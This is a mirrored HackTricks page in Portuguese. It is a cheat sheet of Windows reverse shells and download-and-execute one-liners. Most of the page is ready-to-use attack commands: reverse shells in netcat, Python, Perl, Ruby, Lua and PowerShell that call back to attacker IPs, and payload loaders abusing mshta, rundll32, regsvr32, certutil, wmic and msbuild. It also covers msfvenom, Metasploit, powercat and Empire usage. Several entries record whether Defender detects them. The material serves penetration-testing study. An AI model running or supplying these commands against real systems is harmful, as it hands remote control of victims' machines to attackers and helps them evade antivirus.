mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-25 12:33:39 +00:00
493 lines
22 KiB
Markdown
493 lines
22 KiB
Markdown
# Shells - Windows
|
||
|
||
<details>
|
||
|
||
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
||
Outras maneiras de apoiar o HackTricks:
|
||
|
||
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
||
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
|
||
|
||
</details>
|
||
|
||
**Grupo de Segurança Try Hard**
|
||
|
||
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
|
||
|
||
{% embed url="https://discord.gg/tryhardsecurity" %}
|
||
|
||
***
|
||
|
||
## Lolbas
|
||
|
||
A página [lolbas-project.github.io](https://lolbas-project.github.io/) é para Windows assim como [https://gtfobins.github.io/](https://gtfobins.github.io/) é para linux.\
|
||
Obviamente, **não existem arquivos SUID ou privilégios sudo no Windows**, mas é útil saber **como** alguns **binários** podem ser (mal)usados para realizar algum tipo de ações inesperadas como **executar código arbitrário.**
|
||
|
||
## NC
|
||
```bash
|
||
nc.exe -e cmd.exe <Attacker_IP> <PORT>
|
||
```
|
||
## SBD
|
||
|
||
**[sbd](https://www.kali.org/tools/sbd/) é uma alternativa portátil e segura ao Netcat**. Funciona em sistemas semelhantes ao Unix e Win32. Com recursos como criptografia forte, execução de programas, portas de origem personalizáveis e reconexão contínua, o sbd oferece uma solução versátil para comunicação TCP/IP. Para usuários do Windows, a versão sbd.exe da distribuição Kali Linux pode ser usada como uma substituição confiável para o Netcat.
|
||
```bash
|
||
# Victims machine
|
||
sbd -l -p 4444 -e bash -v -n
|
||
listening on port 4444
|
||
|
||
|
||
# Atackers
|
||
sbd 10.10.10.10 4444
|
||
id
|
||
uid=0(root) gid=0(root) groups=0(root)
|
||
```
|
||
## Python
|
||
```bash
|
||
#Windows
|
||
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
|
||
```
|
||
## Perl
|
||
|
||
Perl is a high-level, general-purpose programming language that is commonly used for scripting and system administration tasks. It is known for its powerful text processing capabilities and is often used for creating shell scripts on Windows systems. Perl scripts can be executed on Windows using the Perl interpreter, which needs to be installed on the system.
|
||
```bash
|
||
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
|
||
```
|
||
## Ruby
|
||
```bash
|
||
#Windows
|
||
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||
```
|
||
## Lua
|
||
```bash
|
||
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
|
||
```
|
||
## OpenSSH
|
||
|
||
Atacante (Kali)
|
||
```bash
|
||
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
|
||
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
|
||
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
|
||
```
|
||
Vítima
|
||
```bash
|
||
#Linux
|
||
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
|
||
|
||
#Windows
|
||
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
|
||
```
|
||
## Powershell
|
||
```bash
|
||
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
|
||
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
|
||
Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')"
|
||
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile
|
||
```
|
||
Processo realizando chamada de rede: **powershell.exe**\
|
||
Carga gravada no disco: **NÃO** (_pelo menos em nenhum lugar que eu pudesse encontrar usando o procmon!_)
|
||
```bash
|
||
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
|
||
```
|
||
Processo realizando chamada de rede: **svchost.exe**\
|
||
Carga gravada no disco: **cache local do cliente WebDAV**
|
||
|
||
**Em uma linha:**
|
||
```bash
|
||
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
|
||
```
|
||
**Obtenha mais informações sobre diferentes Shells do Powershell no final deste documento**
|
||
|
||
## Mshta
|
||
|
||
* [A partir daqui](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||
```bash
|
||
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
|
||
```
|
||
|
||
```bash
|
||
mshta http://webserver/payload.hta
|
||
```
|
||
|
||
```bash
|
||
mshta \\webdavserver\folder\payload.hta
|
||
```
|
||
#### **Exemplo de shell reverso hta-psh (usar hta para baixar e executar backdoor PS)**
|
||
```xml
|
||
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
|
||
```
|
||
**Você pode baixar e executar muito facilmente um zombie Koadic usando o stager hta**
|
||
|
||
#### Exemplo hta
|
||
|
||
[**Daqui**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f)
|
||
```xml
|
||
<html>
|
||
<head>
|
||
<HTA:APPLICATION ID="HelloExample">
|
||
<script language="jscript">
|
||
var c = "cmd.exe /c calc.exe";
|
||
new ActiveXObject('WScript.Shell').Run(c);
|
||
</script>
|
||
</head>
|
||
<body>
|
||
<script>self.close();</script>
|
||
</body>
|
||
</html>
|
||
```
|
||
#### **mshta - sct**
|
||
|
||
[**Daqui**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
|
||
```xml
|
||
<?XML version="1.0"?>
|
||
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
|
||
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
|
||
<!-- mshta vbscript:Close(Execute("GetObject(""script:C:\local\path\scriptlet.sct"")")) -->
|
||
<scriptlet>
|
||
<public>
|
||
</public>
|
||
<script language="JScript">
|
||
<![CDATA[
|
||
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||
]]>
|
||
</script>
|
||
</scriptlet>
|
||
```
|
||
#### **Mshta - Metasploit**
|
||
```bash
|
||
use exploit/windows/misc/hta_server
|
||
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
|
||
msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109
|
||
msf exploit(windows/misc/hta_server) > exploit
|
||
```
|
||
|
||
```bash
|
||
Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit
|
||
```
|
||
**Detectado pelo defensor**
|
||
|
||
|
||
|
||
|
||
## **Rundll32**
|
||
|
||
[**Exemplo de Dll hello world**](https://github.com/carterjones/hello-world-dll)
|
||
|
||
* [Daqui](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||
```bash
|
||
rundll32 \\webdavserver\folder\payload.dll,entrypoint
|
||
```
|
||
|
||
```bash
|
||
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
|
||
```
|
||
**Detectado pelo defensor**
|
||
|
||
**Rundll32 - sct**
|
||
|
||
[**Daqui**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
|
||
```xml
|
||
<?XML version="1.0"?>
|
||
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
|
||
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
|
||
<scriptlet>
|
||
<public>
|
||
</public>
|
||
<script language="JScript">
|
||
<![CDATA[
|
||
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||
]]>
|
||
</script>
|
||
</scriptlet>
|
||
```
|
||
#### **Rundll32 - Metasploit**
|
||
```bash
|
||
use windows/smb/smb_delivery
|
||
run
|
||
#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0
|
||
```
|
||
**Rundll32 - Koadic**
|
||
```bash
|
||
use stager/js/rundll32_js
|
||
set SRVHOST 192.168.1.107
|
||
set ENDPOINT sales
|
||
run
|
||
#Koadic will tell you what you need to execute inside the victim, it will be something like:
|
||
rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();
|
||
```
|
||
## Regsvr32
|
||
|
||
* [A partir daqui](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||
```bash
|
||
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
|
||
```
|
||
|
||
```
|
||
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
|
||
```
|
||
**Detectado pelo defensor**
|
||
|
||
#### Regsvr32 -sct
|
||
|
||
[**Daqui**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1)
|
||
```markup
|
||
<?XML version="1.0"?>
|
||
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
|
||
<!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll -->
|
||
<scriptlet>
|
||
<registration
|
||
progid="PoC"
|
||
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
|
||
<script language="JScript">
|
||
<![CDATA[
|
||
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||
]]>
|
||
</script>
|
||
</registration>
|
||
</scriptlet>
|
||
```
|
||
#### **Regsvr32 - Metasploit**
|
||
```bash
|
||
use multi/script/web_delivery
|
||
set target 3
|
||
set payload windows/meterpreter/reverse/tcp
|
||
set lhost 10.2.0.5
|
||
run
|
||
#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll
|
||
```
|
||
**Você pode baixar e executar facilmente um zombie Koadic usando o stager regsvr**
|
||
|
||
## Certutil
|
||
|
||
* [Daqui](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||
|
||
Baixe um B64dll, decodifique e execute.
|
||
```bash
|
||
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
|
||
```
|
||
Baixe um B64exe, decodifique e execute-o.
|
||
```bash
|
||
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
|
||
```
|
||
**Detectado pelo defensor**
|
||
|
||
|
||
## **Cscript/Wscript**
|
||
```bash
|
||
powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""
|
||
```
|
||
**Cscript - Metasploit**
|
||
```bash
|
||
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs
|
||
```
|
||
**Detectado pelo defensor**
|
||
|
||
## PS-Bat
|
||
```bash
|
||
\\webdavserver\folder\batchfile.bat
|
||
```
|
||
Processo realizando chamada de rede: **svchost.exe**\
|
||
Carga gravada no disco: **cache local do cliente WebDAV**
|
||
```bash
|
||
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
|
||
impacket-smbserver -smb2support kali `pwd`
|
||
```
|
||
|
||
```bash
|
||
\\10.8.0.3\kali\shell.bat
|
||
```
|
||
**Detectado pelo defensor**
|
||
|
||
## **MSIExec**
|
||
|
||
Atacante
|
||
```
|
||
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi
|
||
python -m SimpleHTTPServer 80
|
||
```
|
||
Vítima:
|
||
```
|
||
victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi
|
||
```
|
||
**Detectado**
|
||
|
||
## **Wmic**
|
||
|
||
* [A partir daqui](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||
```bash
|
||
wmic os get /format:"https://webserver/payload.xsl"
|
||
```
|
||
Exemplo de arquivo xsl [daqui](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7):
|
||
```xml
|
||
<?xml version='1.0'?>
|
||
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
|
||
<output method="text"/>
|
||
<ms:script implements-prefix="user" language="JScript">
|
||
<![CDATA[
|
||
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString('http://10.2.0.5/shell.ps1') | powershell -noprofile -");
|
||
]]>
|
||
</ms:script>
|
||
</stylesheet>
|
||
```
|
||
**Não detectado**
|
||
|
||
**Você pode baixar e executar muito facilmente um zumbi Koadic usando o stager wmic**
|
||
|
||
## Msbuild
|
||
|
||
* [Daqui](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||
```
|
||
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
|
||
```
|
||
Pode usar esta técnica para contornar a Lista Branca de Aplicações e restrições do Powershell.exe. Como resultado, será solicitado um shell PS.\
|
||
Basta baixar e executar o seguinte: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj)
|
||
```
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj
|
||
```
|
||
**Não detectado**
|
||
|
||
## **CSC**
|
||
|
||
Compilar código C# na máquina da vítima.
|
||
```
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs
|
||
```
|
||
Pode baixar um shell reverso básico em C# aqui: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc)
|
||
|
||
**Não detectado**
|
||
|
||
## **Regasm/Regsvc**
|
||
|
||
* [Daqui](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||
```bash
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
|
||
```
|
||
**Eu não tentei**
|
||
|
||
[**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182**](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182)
|
||
|
||
## Odbcconf
|
||
|
||
* [Daqui](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||
```bash
|
||
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
|
||
```
|
||
**Eu não tentei**
|
||
|
||
[**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2)
|
||
|
||
## Shells do Powershell
|
||
|
||
### PS-Nishang
|
||
|
||
[https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
|
||
|
||
Na pasta **Shells**, existem muitas shells diferentes. Para baixar e executar o Invoke-_PowerShellTcp.ps1_ faça uma cópia do script e adicione ao final do arquivo:
|
||
```
|
||
Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444
|
||
```
|
||
Comece a servir o script em um servidor web e execute-o no final da vítima:
|
||
```
|
||
powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"
|
||
```
|
||
Defender ainda não o detecta como código malicioso (até 3/04/2019).
|
||
|
||
**TODO: Verificar outros shells do nishang**
|
||
|
||
### **PS-Powercat**
|
||
|
||
[**https://github.com/besimorhino/powercat**](https://github.com/besimorhino/powercat)
|
||
|
||
Baixe, inicie um servidor web, inicie o ouvinte e execute no final da vítima:
|
||
```
|
||
powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
|
||
```
|
||
Defender ainda não o detecta como código malicioso (ainda, 3/04/2019).
|
||
|
||
**Outras opções oferecidas pelo powercat:**
|
||
|
||
Conexão de shells, Shell reverso (TCP, UDP, DNS), Redirecionamento de porta, upload/download, Gerar payloads, Servir arquivos...
|
||
```
|
||
Serve a cmd Shell:
|
||
powercat -l -p 443 -e cmd
|
||
Send a cmd Shell:
|
||
powercat -c 10.1.1.1 -p 443 -e cmd
|
||
Send a powershell:
|
||
powercat -c 10.1.1.1 -p 443 -ep
|
||
Send a powershell UDP:
|
||
powercat -c 10.1.1.1 -p 443 -ep -u
|
||
TCP Listener to TCP Client Relay:
|
||
powercat -l -p 8000 -r tcp:10.1.1.16:443
|
||
Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:
|
||
powercat -c 10.1.1.15 -p 443 -e cmd -g
|
||
Start A Persistent Server That Serves a File:
|
||
powercat -l -p 443 -i C:\inputfile -rep
|
||
```
|
||
### Empire
|
||
|
||
[https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire)
|
||
|
||
Crie um iniciador powershell, salve-o em um arquivo e faça o download e execute-o.
|
||
```
|
||
powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
|
||
```
|
||
**Detectado como código malicioso**
|
||
|
||
### MSF-Unicorn
|
||
|
||
[https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn)
|
||
|
||
Crie uma versão em powershell de uma backdoor do metasploit usando o unicorn
|
||
```
|
||
python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443
|
||
```
|
||
Inicie o msfconsole com o recurso criado:
|
||
```
|
||
msfconsole -r unicorn.rc
|
||
```
|
||
Inicie um servidor web servindo o arquivo _powershell\_attack.txt_ e execute no alvo:
|
||
```
|
||
powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"
|
||
```
|
||
**Detectado como código malicioso**
|
||
|
||
## Mais
|
||
|
||
[PS>Attack](https://github.com/jaredhaight/PSAttack) Console PS com alguns módulos ofensivos PS pré-carregados (cifrado)\
|
||
[https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c)[\
|
||
WinPWN](https://github.com/SecureThisShit/WinPwn) Console PS com alguns módulos ofensivos PS e detecção de proxy (IEX)
|
||
|
||
## Referências
|
||
|
||
* [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
|
||
* [https://gist.github.com/Arno0x](https://gist.github.com/Arno0x)
|
||
* [https://github.com/GreatSCT/GreatSCT](https://github.com/GreatSCT/GreatSCT)
|
||
* [https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/](https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/)
|
||
* [https://www.hackingarticles.in/koadic-com-command-control-framework/](https://www.hackingarticles.in/koadic-com-command-control-framework/)
|
||
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
|
||
* [https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||
|
||
**Try Hard Security Group**
|
||
|
||
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
|
||
|
||
{% embed url="https://discord.gg/tryhardsecurity" %}
|
||
|
||
<details>
|
||
|
||
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
||
Outras formas de apoiar o HackTricks:
|
||
|
||
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
||
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
* Descubra [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou nos siga no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
||
</details>
|